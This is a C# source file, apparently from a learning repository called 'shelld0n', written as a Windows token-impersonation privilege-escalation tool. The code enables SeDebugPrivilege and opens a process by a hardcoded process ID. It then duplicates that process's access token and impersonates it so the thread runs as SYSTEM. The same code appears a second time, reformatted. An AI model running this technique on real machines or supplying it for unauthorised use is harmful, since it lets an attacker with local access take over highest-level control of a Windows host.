shelld0n/SYSTEM.cs

## SYSTEM.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;

namespace Token
{
    class Program
    {
        static void Main(string[] args)
        {
            // Objectif is : https://0x00-0x00.github.io/research/2018/10/17/Windows-API-and-Impersonation-Part1.html

            // Enable SeDebugPrivilege ?
            string Privilege = "SeDebugPrivilege";
            API.LUID luid = new API.LUID();
            IntPtr hProcess = API.GetCurrentProcess();
            IntPtr hToken;
            if (!API.OpenProcessToken(hProcess, API.TOKEN_QUERY | API.TOKEN_ADJUST_PRIVILEGES, out hToken)) { Console.WriteLine("No tokens for current process"); Environment.Exit(2); };
            if (!API.LookupPrivilegeValue(null, Privilege, out luid)) { Console.WriteLine("No handle for privilege"); Environment.Exit(2); };
            API.LUID_AND_ATTRIBUTES luAttr = new API.LUID_AND_ATTRIBUTES { Luid = luid, Attributes = API.LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED };
            API.TOKEN_PRIVILEGES tp = new API.TOKEN_PRIVILEGES { PrivilegeCount = 1, Privileges = new API.LUID_AND_ATTRIBUTES[1] };
            tp.Privileges[0] = luAttr;
            API.TOKEN_PRIVILEGES oldState = new API.TOKEN_PRIVILEGES(); // Our old state.
            UInt32 trash;
            if (!API.AdjustTokenPrivileges(hToken, false, ref tp, (UInt32)Marshal.SizeOf(tp), ref oldState, out trash)) { Console.WriteLine("Can't Adjust access Token"); Environment.Exit(2); };


            // Duplicate Tokens for system process and use them
            Console.WriteLine("your journey just started");
            IntPtr test = API.OpenProcess(API.ProcessAccessFlags.QueryInformation, true, 1340);
            //IntPtr test = API.GetCurrentProcess();
            if (test == IntPtr.Zero) Console.WriteLine("No Handle to process !");
            IntPtr tokenHandle;
            bool result_token = API.OpenProcessToken(test, API.TOKEN_READ | API.TOKEN_IMPERSONATE | API.TOKEN_DUPLICATE, out tokenHandle);
            Console.WriteLine(result_token);
            IntPtr DuplicatedToken = new IntPtr();
            bool result_duplicate = API.DuplicateToken(tokenHandle, 2, ref DuplicatedToken);
            Console.WriteLine(result_duplicate);
            bool result_settoken = API.SetThreadToken(IntPtr.Zero, DuplicatedToken);
            Console.WriteLine(result_settoken);
            Console.ReadKey();
            //System.Diagnostics.Process.Start("CMD.exe", "whoami");
            Console.WriteLine(Environment.UserName);
            Console.ReadKey();
        }
    }
}
	using System;
	using System.Collections.Generic;
	using System.Linq;
	using System.Text;
	using System.Threading.Tasks;
	using System.Runtime.InteropServices;

	namespace Token
	{
	class Program
	{
	static void Main(string[] args)
	{
	// Objectif is : https://0x00-0x00.github.io/research/2018/10/17/Windows-API-and-Impersonation-Part1.html

	// Enable SeDebugPrivilege ?
	string Privilege = "SeDebugPrivilege";
	API.LUID luid = new API.LUID();
	IntPtr hProcess = API.GetCurrentProcess();
	IntPtr hToken;
	if (!API.OpenProcessToken(hProcess, API.TOKEN_QUERY \| API.TOKEN_ADJUST_PRIVILEGES, out hToken)) { Console.WriteLine("No tokens for current process"); Environment.Exit(2); };
	if (!API.LookupPrivilegeValue(null, Privilege, out luid)) { Console.WriteLine("No handle for privilege"); Environment.Exit(2); };
	API.LUID_AND_ATTRIBUTES luAttr = new API.LUID_AND_ATTRIBUTES { Luid = luid, Attributes = API.LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED };
	API.TOKEN_PRIVILEGES tp = new API.TOKEN_PRIVILEGES { PrivilegeCount = 1, Privileges = new API.LUID_AND_ATTRIBUTES[1] };
	tp.Privileges[0] = luAttr;
	API.TOKEN_PRIVILEGES oldState = new API.TOKEN_PRIVILEGES(); // Our old state.
	UInt32 trash;
	if (!API.AdjustTokenPrivileges(hToken, false, ref tp, (UInt32)Marshal.SizeOf(tp), ref oldState, out trash)) { Console.WriteLine("Can't Adjust access Token"); Environment.Exit(2); };


	// Duplicate Tokens for system process and use them
	Console.WriteLine("your journey just started");
	IntPtr test = API.OpenProcess(API.ProcessAccessFlags.QueryInformation, true, 1340);
	//IntPtr test = API.GetCurrentProcess();
	if (test == IntPtr.Zero) Console.WriteLine("No Handle to process !");
	IntPtr tokenHandle;
	bool result_token = API.OpenProcessToken(test, API.TOKEN_READ \| API.TOKEN_IMPERSONATE \| API.TOKEN_DUPLICATE, out tokenHandle);
	Console.WriteLine(result_token);
	IntPtr DuplicatedToken = new IntPtr();
	bool result_duplicate = API.DuplicateToken(tokenHandle, 2, ref DuplicatedToken);
	Console.WriteLine(result_duplicate);
	bool result_settoken = API.SetThreadToken(IntPtr.Zero, DuplicatedToken);
	Console.WriteLine(result_settoken);
	Console.ReadKey();
	//System.Diagnostics.Process.Start("CMD.exe", "whoami");
	Console.WriteLine(Environment.UserName);
	Console.ReadKey();
	}
	}
	}